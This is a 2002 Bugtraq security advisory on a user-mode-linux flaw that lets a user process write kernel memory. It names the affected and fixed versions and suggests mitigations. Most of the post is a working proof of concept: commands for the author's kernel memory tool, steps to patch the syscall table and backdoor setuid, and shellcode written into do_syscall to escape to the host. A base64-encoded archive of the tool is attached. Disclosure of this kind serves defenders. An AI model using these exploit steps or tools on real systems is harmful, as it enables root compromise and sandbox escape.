Date: Mon, 28 Jan 2002 13:16:57 +1100 (EST)
From: Andrew Griffiths <andrewg@tasmail.com>
To: bugtraq@securityfocus.com
Subject: user-mode-linux problems
--VisualMail-05100281
Content-type: text/plain; charset=us-ascii
Program: User-mode-linux
Version tested: patch-2.4.17-8 [ I assume all previous versions would be ]
Not vulnerable: patch-2.4.17-9 [ Haven't tested any different techniques.]
Now for something completely different. Anything in []'s is my comments to
my article... deal with it.
Description:
------------
User-mode-linux is used to enchance kernel development by providing a debuggable
kernel, and also as a safebox for some applications.
[ Hereafter, uml refers to user-mode-linux. ]
Problem:
--------
A user proccess can write into kernel memory, which will allow a person to get root inside the uml "box", and the possibility to break out of the uml "box", into the real one.
This can happen even if the jail and honeypot options are turned on. [ Though I suspect the version i was testing was half-way through implementing them ]
Some effects can happen, such as causing the uml processes to die, and making a
process chew up heaps of cpu time indefinately.
Reproducing:
------------
I used the small debian 2.2 root fs to play around with, on a host kernel of
2.4.17ctx-5 (vserver context security patch).
To start it up I used:
[andrewg@blackhole linux]$ ./linux ubd0=debcow,root_fs_debian2.2_small jail=1 honeypot=1 jail honeypot
[ I'm being doubly cautious, and looking at the jail setup code, I don't think
it would have been bothered by my putting it in their twice. ]
Mitigation:
-----------
Well, to prevent some of the problems, I suggest running the uml in a chroot()ed
enviroment, with memory and cpu restrictions turned on.
Not allow people to run their own code. Well, thats rather tricky, since if
they can overflow anything (just a normal program) and execute code of their
own choosing, you have pretty much lost already...
[ Free tip for those who use it for high security. Put all the binaries on a
seperate ubd device, and leave make it non-writable by the uml process. That
way you don't have the replaced-replaced-binary problem, however, /bin would be hard to do. ]
Fix:
----
Upgrade.
Exploit:
--------
There is no exploit as such yet, just a tool to help you exploit it. Attached
is a program for you to play around with.
This program is somewhat simple, and definately not finished. However, it does everything I needed it do, plus a couple of other things.
For the commands you don't specify the offset for sys_call_table, it uses the
built in one at 0xa019f650. [ Which is nolonger valid for my ./linux, and most
likely not for your system. ]
[andrewg@blackhole mpmt]$ ./mpmt -h
./mpmt: invalid option -- h [ Hey, I said it wasn't finished. ]
Multi-Purpose Modification Tool v0.6 by Andrew Griffiths
./mpmt -1 [ -2 ] [ -o ] [ -p | -f | -s ] [ -r ]
./mpmt -o 0xa020ee1f -p -1 61
Would print out the offset of chroot at the sys_call_table
location of 0xa020ee1f
./mpmt -1 23 -2 36
Would replace setuid()'s location in sys_call_table with
sync()s function.
./mpmt -1 23 -2 36 -r
Would replace setuid()'s location in sys_call_table with
sync()s function, and restore it back to it would in n
seconds. (time default is 30 seconds)
For values of these numbers, look in /usr/include/asm/unistd.h
Also, you can do abiratory read and writes on kernel memory,
with the -a for the address, -c for how much to copy, -R to
read, and -W to write and -F to specify file.
[andrewg@blackhole mpmt]$
To do things like play around with the sys_call_table, you'll need the
address of it. To get it, just do:
[andrewg@blackhole linux]$ nm -a linux | grep sys_call_table
a01bb744 D sys_call_table
00000000 a sys_call_table.c
[andrewg@blackhole linux]$
and the first address is the sys_call_table. I haven't looked into determining
the sys_call_table address while you're in it. I suspect it could be done by
looking at the kernel memory (which is an elf file), and finding the address
via the global offset table, or something. If it isn't stripped, you should be
laughing. Once you can work these out, you should be able to write a version
independant exploit.
Since you've already seen some of the things it does, I'll explain the bottom
parts.
To get a copy of the first 256 bytes of the sys_call_table struct, and to dump
it into systable:
andrewg@usermode:~$ ./mpmt -a 0xa01bb744 -c 256 -R -F systable
To get the first 2048 bytes of setuid so you can backdoor it:
andrewg@usermode:~$ ./mpmt -o 0xa01bb744 -p -1 23
Location in memory where function 23 is 0xa0018024
andrewg@usermode:~$ ./mpmt -a 0xa0018024 -c 2048 -F setuid.dump -R
andrewg@usermode:~$ [ Now run ndisasm and patch and then run... ]
andrewg@usermode:~$ ./mpmt -a 0xa0018024 -c 2048 -F setuid.dump -W
The sharp reader will have already noticed that we could replace the getuid
with a harmless syscall such as sync, and then call su || su -c "shell script"
to do what we want. However, on my system, there's a couple of problems, like it
starting of way too many su proccess's or them dying straight away. However the
-c one seems to work...
[ News just in... ]
And now for the ultimate exploit against User-mode-linux: Breaking out of it.
To break out of uml, you need to cause the tracer program to execute code of
your choosing. [ No shit!?! Thats because the tracer pid isn't running being
ptraced itself. Sidenote: If you could kill the tracer, you might be able to
execute cide... ] We can accomplice this by writing into certain areas of
memory... The function I have choose to target is do_syscall.
Now, for the exploitation:
[andrewg@blackhole andrewg]$ nm -a /usr/src/linux/linux | grep do_syscall
a01000f0 T do_syscall
[andrewg@blackhole andrewg]$ cat /tmp/sh <<_EOF_
#!/bin/sh
echo OWNED > /tmp/umlisbroken
_EOF_
[andrewg@blackhole andrewg]$ chmod +x /tmp/sh
And now for the usermode linux part, where ex is just a program that spits out
standard Aleph1 (Phrack 49) shellcode.
andrewg@usermode:~$ ./ex | sed s/bin/tmp/ > exploit_code
andrewg@usermode:~$ ./mpmt -a 0xa01000f0 -c 43 -W -F exploit_code
At this point, the screen where you started UML, is probably a message like:
Kernel panic: Error mapping a page - errno = 9 [ Bad File descriptor ]
I suspect its trying to mmap() a page from somewhere with a fd that isn't valid
for the real kernel. (Cause it's no longer being ptrace()d.)
And now [Drum roll please]
[andrewg@blackhole andrewg]$ cat /tmp/umlisbroken
OWNED
[andrewg@blackhole andrewg]$
You may be asking why the shellcode doesn't do anything more interesting than
exec()ing /tmp/sh, well, you gotta remember this is for "proof of concept"...
Don't forget to do a "killall -9 linux" and restart it, cause you've just
killed it....
--
www.tasmail.com
--VisualMail-05100281
Content-type: application/octet-stream; name="mpmt.tgz"
Content-transfer-encoding: base64
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
TR/j9D941SkoAHgAAA==
--VisualMail-05100281--
